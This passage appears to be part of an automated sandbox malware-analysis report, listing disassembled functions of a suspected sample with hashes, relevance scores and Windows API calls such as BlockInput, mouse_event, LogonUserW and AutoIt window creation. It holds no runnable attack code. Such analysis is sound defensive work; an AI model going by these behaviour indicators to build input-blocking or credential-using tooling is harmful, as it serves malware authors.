Instruction ID: 7d9c678859c5257dbc1a5619e3b1a578c9196116c7a087ecf3a5a0b2d584f8a9
Opcode Fuzzy Hash: 73f925ece0013b44a5d20576a810399a1b0ceb48cb06ce37dbd7bbaa361366d8
Instruction Fuzzy Hash: 61320521D29F024DD7239634C872335A29AAFB73D5F15D727EC1AB5AA6DF29C4C74100

Function 006396C0 Relevance: 2.1, APIs: 1, Instructions: 573COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: __itow__swprintf
String ID:
API String ID: 674341424-0
Opcode ID: c4dbb85410f4979b36d5c4e68706c6b6cc5a7d20a006c158bee67f91bf19043a
Instruction ID: 847f0ddab87660c4b9a96f93e4420aa3955f8e1d4d6f96b091200b7b56541458
Opcode Fuzzy Hash: c4dbb85410f4979b36d5c4e68706c6b6cc5a7d20a006c158bee67f91bf19043a
Instruction Fuzzy Hash: B32299716083019FD764EF24C890BABB7E6AF84310F10491DF89A97291DBB1ED45CFA6

Function 0066038E Relevance: 1.8, APIs: 1, Instructions: 294COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8897a61733a59aa6eb2b95dc4d71b16278466a65fd00002e421033c08eecbecc
Instruction ID: 1a5c40d732206eb374fd134aadb9b607c8f75473995536ce14036b0bbef986f9
Opcode Fuzzy Hash: 8897a61733a59aa6eb2b95dc4d71b16278466a65fd00002e421033c08eecbecc
Instruction Fuzzy Hash: 9FB1BD20E2AF414DD72396398831336B65DAFBB2D5B91E71BFC1BB4D22EB2195C34180

Function 0067B6CC Relevance: 1.6, APIs: 1, Instructions: 71COMMON

Download Yara Rule

APIs

__time64.LIBCMT ref: 0067B6DF

Part of subcall function 0065344A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,0067BDC3,00000000,?,?,?,?,0067BF70,00000000,?), ref: 00653453
Part of subcall function 0065344A: __aulldiv.LIBCMT ref: 00653473

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: Time$FileSystem__aulldiv__time64
String ID:
API String ID: 2893107130-0
Opcode ID: 84d110238f32967ee01e07b3fdc93d21401e2b0ed10fd59ec154e208167edd4a
Instruction ID: e0b127406b828448bd2d0fb150d12cc264754cfdd368bcac8c6d56185548c682
Opcode Fuzzy Hash: 84d110238f32967ee01e07b3fdc93d21401e2b0ed10fd59ec154e208167edd4a
Instruction Fuzzy Hash: 802172726345108BC729CF38C881BA2B7E2EB95310B249E6DE4E5CF2C0CB74B905DB54

Function 00686AAF Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON

Download Yara Rule

APIs

BlockInput.USER32(00000001), ref: 00686ACA

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: BlockInput
String ID:
API String ID: 3456056419-0
Opcode ID: 0fbf0cc4345026ef13a9565564ef61e01f42ec016ac275bee8367fc2661d8a3f
Instruction ID: edcb2f1ee5bdcd7a0d8c09f5976131c174982126af4dbba43c8ed551b1876631
Opcode Fuzzy Hash: 0fbf0cc4345026ef13a9565564ef61e01f42ec016ac275bee8367fc2661d8a3f
Instruction Fuzzy Hash: 6CE048752002056FC740EF59D404D96B7EEAF74751F04C41AF946D7351DAB0F8448BA0

Function 006774E7 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 0067750A

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: mouse_event
String ID:
API String ID: 2434400541-0
Opcode ID: 2286c492a760239a3856320e6731ab7ef4f7599545b8dab460881523b0eae43e
Instruction ID: 21e8ca84f5f41daa9d4540877258d5ac74ef5bc65e190c67eae67e4c31dec938
Opcode Fuzzy Hash: 2286c492a760239a3856320e6731ab7ef4f7599545b8dab460881523b0eae43e
Instruction Fuzzy Hash: 19D01CA013C20428F82903208C1BFB60A4AA300784FD8C689B20AA92C0E8A06D02E430

Function 0066B106 Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

LogonUserW.ADVAPI32(?,00000001,?,?,00000000,0066AD3E), ref: 0066B124

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: LogonUser
String ID:
API String ID: 1244722697-0
Opcode ID: 55f154a3d0af12862c00b84b034d1b647154b04cf2e6ab47872e1efef66727f1
Instruction ID: c1718ab31a9cab8da923a403f5aa12c930ced3cb9c995cfd6054b03eb9b8220d
Opcode Fuzzy Hash: 55f154a3d0af12862c00b84b034d1b647154b04cf2e6ab47872e1efef66727f1
Instruction Fuzzy Hash: 95D05E320A460EAEDF025FA4DC02EAE3F6AEB04700F408110FA11C90A0C671D531AB50

Function 006AB340 Relevance: 1.5, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32 ref: 006AB352

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: 27425defa6cd672f313ac101311bcb717e48c7be887bbbd25c31c94d9d9d5e8d
Instruction ID: 5430d41d80fbcc2f497aa1e014d0a20ea0d7af32038866e335414b982a320efb
Opcode Fuzzy Hash: 27425defa6cd672f313ac101311bcb717e48c7be887bbbd25c31c94d9d9d5e8d
Instruction Fuzzy Hash: D1C04CF1400119DFD751DFC0C9449EEB7BDAB04305F105192A106F1110D7709B859F72

Function 00658189 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(?), ref: 0065818F

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 0ea7cacded8896518551c93fe000479b2db3d2abe8b29e47d4a23b4fe926bb43
Instruction ID: faee7bb99ca901dd7a6405e2ed63e6f2fb94c40963f55b0607d3cb4920b78435
Opcode Fuzzy Hash: 0ea7cacded8896518551c93fe000479b2db3d2abe8b29e47d4a23b4fe926bb43
Instruction Fuzzy Hash: 37A0223000020CFBCF002F82FC088883FAEFB022A0B000030F80C88032EB33A8A08BC2

Function 006393F0 Relevance: .5, Instructions: 531COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 44e6cc8356cf55a07011da5071269a8cc20f2ae4fbb62073b36729a2e5352034
Instruction ID: bc6b96164620c6298c2de95c550c9db7a68457d0c75a0d49dbe465da3dc0d321
Opcode Fuzzy Hash: 44e6cc8356cf55a07011da5071269a8cc20f2ae4fbb62073b36729a2e5352034
Instruction Fuzzy Hash: 1C127E70A0020A9FDF44DFA9D991AEEB7F6FF48300F108569E406E7251EB35AD15CBA4

Function 0063E3E3 Relevance: .5, Instructions: 521COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c8822384d42c7ad1ed415f66c55d67f9f73137eae5df892c3779673a45f2d731
Instruction ID: 7b702d4f7eabc8a65995441743baac5355187a7ea42b826a369c4934c1760d1a
Opcode Fuzzy Hash: c8822384d42c7ad1ed415f66c55d67f9f73137eae5df892c3779673a45f2d731
Instruction Fuzzy Hash: B2129074D04205DFDB24DF54C491AAAB7F2FF19314F248069E9469B392E732AD82CBE1

Function 0063AF50 Relevance: .5, Instructions: 514COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: Exception@8Throwstd::exception::exception
String ID:
API String ID: 3728558374-0
Opcode ID: 92aa1189c2b5eb037877ac58d3b55dc771b6630face9644897d3311790d8a077
Instruction ID: daf7e53daed7a2e7947048f74de173f89d23a03792185408ad9ae14d7ec6690b
Opcode Fuzzy Hash: 92aa1189c2b5eb037877ac58d3b55dc771b6630face9644897d3311790d8a077
Instruction Fuzzy Hash: 08029070A0020ADBCF44EF68D991AAEB7B6FF45300F148069E906DB295EB31DE15CB95

Function 006502A4 Relevance: .3, Instructions: 345COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
Instruction ID: 2789ce3d4ed1dd629017e0f8da9d3ab5b035246d4f79a5bda02e771feca0cb8e
Opcode Fuzzy Hash: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
Instruction Fuzzy Hash: 7CC1A7322051934AFF2D4739C4345BEBAA25E917B371A176DE8B3CB6D5EF20C528D620

Function 006506D9 Relevance: .3, Instructions: 341COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
Instruction ID: 6fcf8c53170222a9230e7f0d2e3a30a0c6c038995355237eec4bc35727587a6c
Opcode Fuzzy Hash: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
Instruction Fuzzy Hash: 5EC1A73220519309FF2D4639C43457EBBA25E927B371A176DE8B3CB6D5EF20D528D620

Function 0064FE6F Relevance: .3, Instructions: 331COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
Instruction ID: 137bce9ebd2d5e2a605e75346f77c42d0af441b9aa9a3b324bb34da4360d1e3a
Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
Instruction Fuzzy Hash: 0BC1D7322051930AEF6D4739C4345BEFBA25AA27B271A177DE8B3CB6D5EF10C528D610

Function 0064FA57 Relevance: .3, Instructions: 323COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction ID: 9a71ca882872658fbd57b001cfa901021ca91d7619f6f61d479b039f0dee0c4d
Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction Fuzzy Hash: 31C1833220509309EF2D4739C4745BFBAA25EA2BB631A177DE4B3CB6D5EF20C564D620

Function 0068A2A9 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 490filecommemoryCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 0068A2FE
DeleteObject.GDI32(00000000), ref: 0068A310
DestroyWindow.USER32 ref: 0068A31E
GetDesktopWindow.USER32 ref: 0068A338
GetWindowRect.USER32(00000000), ref: 0068A33F
SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0068A480
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 0068A490
CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0068A4D8
GetClientRect.USER32(00000000,?), ref: 0068A4E4
CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0068A51E
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0068A540
GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0068A553
GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0068A55E
GlobalLock.KERNEL32(00000000), ref: 0068A567
ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0068A576
GlobalUnlock.KERNEL32(00000000), ref: 0068A57F
CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0068A586
GlobalFree.KERNEL32(00000000), ref: 0068A591
CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0068A5A3
OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,006BD9BC,00000000), ref: 0068A5B9
GlobalFree.KERNEL32(00000000), ref: 0068A5C9
CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 0068A5EF
SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 0068A60E
SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0068A630
ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0068A81D

Strings

static, xrefs: 0068A518, 0068A66F
, xrefs: 0068A7A3
DISPLAY, xrefs: 0068A680
AutoIt v3, xrefs: 0068A4D0

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
String ID: $AutoIt v3$DISPLAY$static
API String ID: 2211948467-2373415609
Opcode ID: a219e843fd6b748700d42baa92cf837869dd2135450c5c7e27dc676807e15535
Instruction ID: d4c56652df7ad664928ae1c8d4a56ef4d1167ce78583064919787c7535eb05b7
Opcode Fuzzy Hash: a219e843fd6b748700d42baa92cf837869dd2135450c5c7e27dc676807e15535
Instruction Fuzzy Hash: 9A027FB5900215EFDB14DFA4DD89EAE7BBAFF49310F048259F905AB2A0DB709D41CB60

Function 0069D285 Relevance: 49.8, APIs: 33, Instructions: 260COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 0069D2DB
GetSysColorBrush.USER32(0000000F), ref: 0069D30C
GetSysColor.USER32(0000000F), ref: 0069D318
SetBkColor.GDI32(?,000000FF), ref: 0069D332
SelectObject.GDI32(?,00000000), ref: 0069D341
InflateRect.USER32(?,000000FF,000000FF), ref: 0069D36C
GetSysColor.USER32(00000010), ref: 0069D374
CreateSolidBrush.GDI32(00000000), ref: 0069D37B
FrameRect.USER32(?,?,00000000), ref: 0069D38A
DeleteObject.GDI32(00000000), ref: 0069D391
InflateRect.USER32(?,000000FE,000000FE), ref: 0069D3DC
FillRect.USER32(?,?,00000000), ref: 0069D40E
GetWindowLongW.USER32(?,000000F0), ref: 0069D439

Part of subcall function 0069D575: GetSysColor.USER32(00000012), ref: 0069D5AE
Part of subcall function 0069D575: SetTextColor.GDI32(?,?), ref: 0069D5B2
Part of subcall function 0069D575: GetSysColorBrush.USER32(0000000F), ref: 0069D5C8
Part of subcall function 0069D575: GetSysColor.USER32(0000000F), ref: 0069D5D3
Part of subcall function 0069D575: GetSysColor.USER32(00000011), ref: 0069D5F0
Part of subcall function 0069D575: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0069D5FE
Part of subcall function 0069D575: SelectObject.GDI32(?,00000000), ref: 0069D60F
Part of subcall function 0069D575: SetBkColor.GDI32(?,00000000), ref: 0069D618
Part of subcall function 0069D575: SelectObject.GDI32(?,?), ref: 0069D625
Part of subcall function 0069D575: InflateRect.USER32(?,000000FF,000000FF), ref: 0069D644
Part of subcall function 0069D575: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0069D65B
Part of subcall function 0069D575: GetWindowLongW.USER32(00000000,000000F0), ref: 0069D670
Part of subcall function 0069D575: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0069D698

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
String ID:
API String ID: 3521893082-0
Opcode ID: 9a1ad08ae10dd51c0d586d8433b7e2a1fcabfd45b2faca9781f4f0f9a90c9abc
Instruction ID: 7dcace130088a9743abce32e411ed229a78cfc06b3a7f1167cdf270e55c8d33c
Opcode Fuzzy Hash: 9a1ad08ae10dd51c0d586d8433b7e2a1fcabfd45b2faca9781f4f0f9a90c9abc
Instruction Fuzzy Hash: 119171B2408301BFDB109F64DC48A6B7BAAFF85325F101B29F5529A1E0E771D985CB52

Function 0064B8FD Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 491windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32 ref: 0064B98B
DeleteObject.GDI32(00000000), ref: 0064B9CD
DeleteObject.GDI32(00000000), ref: 0064B9D8
DestroyIcon.USER32(00000000), ref: 0064B9E3
DestroyWindow.USER32(00000000), ref: 0064B9EE
SendMessageW.USER32(?,00001308,?,00000000), ref: 006AD2AA
ImageList_Remove.COMCTL32(?,000000FF,?), ref: 006AD2E3
MoveWindow.USER32(00000000,?,?,?,?,00000000), ref: 006AD711

Part of subcall function 0064B9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,0064B759,?,00000000,?,?,?,?,0064B72B,00000000,?), ref: 0064BA58

SendMessageW.USER32 ref: 006AD758
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 006AD76F
ImageList_Destroy.COMCTL32(00000000), ref: 006AD785
ImageList_Destroy.COMCTL32(00000000), ref: 006AD790

Strings

0, xrefs: 006AD5A5

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
